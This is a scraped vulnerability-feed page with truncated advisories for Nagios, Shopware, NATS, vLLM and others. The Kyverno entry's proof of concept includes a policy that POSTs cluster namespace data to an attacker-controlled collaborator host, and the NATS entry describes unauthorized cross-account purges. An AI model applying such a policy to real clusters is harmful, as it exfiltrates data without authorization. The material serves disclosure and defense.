Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
CVE-2025-29471 |
Description: Cross Site Scripting vulnerability in Nagios Log Server v.2024R1.3.1 allows a remote attacker to execute arbitrary code via a payload into the Email field.
EPSS Score: 1.47%
April 15th, 2025 (6 days ago)
|
|
CVE-2025-27892 |
Description: Shopware prior to version 6.5.8.13 is affected by a SQL injection vulnerability in the /api/search/order endpoint. NOTE: this issue exists because of a CVE-2024-22406 and CVE-2024-42357 regression.
EPSS Score: 0.03%
April 15th, 2025 (6 days ago)
|
|
Description: A company is only as strong as its roots, and A-1 Freeman Moving Group's roots are firmly planted in a culture of honesty, integrity, and hard work. In 1974, Jim Freeman founded A-1 Freeman Moving Group in Oklahoma City, OK on a belief that h ...
April 15th, 2025 (6 days ago)
|
|
Description: Dark Storm Team Targeted the Website of 4chan
April 15th, 2025 (6 days ago)
|
|
Description: Summary
An attacker with the ability to create Kyverno policies in a Kubernetes cluster can use Service Call functionality to perform SSRF to a server under their control in order to exfiltrate data.
Details
According to the documentation, Service Call is intended to address services located inside the Kubernetes cluster, but this method can also resolve external addresses, which allows making requests outside the Kubernetes cluster.
https://kyverno.io/docs/writing-policies/external-data-sources/#variables-from-service-calls
PoC
Create a slightly modified Cluster Policy from the documentation. In the url we specify the address of a server controlled by the attacker, for example Burp Collaborator.
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: check-namespaces
spec:
rules:
- name: call-extension
match:
any:
- resources:
kinds:
- ConfigMap
context:
- name: result
apiCall:
method: POST
data:
- key: namespace
value: "{{request.namespace}}"
service:
url: http://bo3gyn4qwyjnrx87fjnrsd4p7gd71xpm.oastify.com/payload
validate:
message: "namespace {{request.namespace}} is not allowed"
deny:
conditions:
all:
- key: "{{ result.allowed }}"
operator: Equals
value: false
Now let's create some configmap:
kubectl create configmap special-config --from-literal=special.how=very --from-li...
April 15th, 2025 (6 days ago)
|
|
|
Description: Advisory
The management of JetStream assets happens with messages in the $JS. subject namespace in the system account; this is partially exposed into regular accounts to allow account holders to manage their assets.
Some of the JS API requests were missing access controls, allowing any user with JS management permissions in any account to perform certain administrative actions on any JS asset in any other account. At least one of the unprotected APIs allows for data destruction. None of the affected APIs allow disclosing stream contents.
Affected versions
NATS Server:
Version 2 from v2.2.0 onwards, prior to v2.11.1 or v2.10.27
Original Report
(Lightly edited to confirm some supposition and in the summary to use past tense)
Summary
nats-server did not include authorization checks on 4 separate admin-level JetStream APIs: account purge, server remove, account stream move, and account stream cancel-move.
In all cases, APIs are not properly restricted to system-account users. Instead, any authorized user can execute the APIs, including across account boundaries, as long as the current user merely has permission to publish on $JS.>.
Only the first seems to be of highest severity. All are included in this single report as they seem likely to have the same underlying root cause.
Reproduction of the ACCOUNT.PURGE case is below. The others are like it.
Details & Impact
Issue 1: $JS.API.ACCOUNT.PURGE.*
Any user may perform an account purge of any other account (including their ...
April 15th, 2025 (6 days ago)
|
|
|
Description: Impact
This report is to highlight a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-389x-67px-mjg3
The xgrammar library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). Xgrammar provides a required, built-in cache for its compiled grammars stored in RAM. xgrammar is available by default through the OpenAI compatible API server with both the V0 and V1 engines.
A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service by consuming all of the system's RAM.
Note that even if vLLM was configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the guided_decoding_backend key of the extra_body field of the request with the V0 engine. This per-request choice is not available when using the V1 engine.
Patches
https://github.com/vllm-project/vllm/pull/16283
Workarounds
There is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.
References
https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-389x-67px-mjg3
References
https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-389x-67px-mjg3
https://github.com/vllm-project/vllm/security/ad...
April 15th, 2025 (6 days ago)
|
|
CVE-2024-44843 |
Description: An issue in the web socket handshake process of SteVe v3.7.1 allows attackers to bypass authentication and execute arbitrary coammands via supplying crafted OCPP requests.
EPSS Score: 0.05%
April 15th, 2025 (6 days ago)
|
|
Description: ChatGPT 4.1 is now rolling out, and it's a significant leap from GPT 4o, but it fails to beat the benchmark set by Google's most powerful model, Gemini. [...]
April 15th, 2025 (6 days ago)
|
|
April 15th, 2025 (6 days ago)
|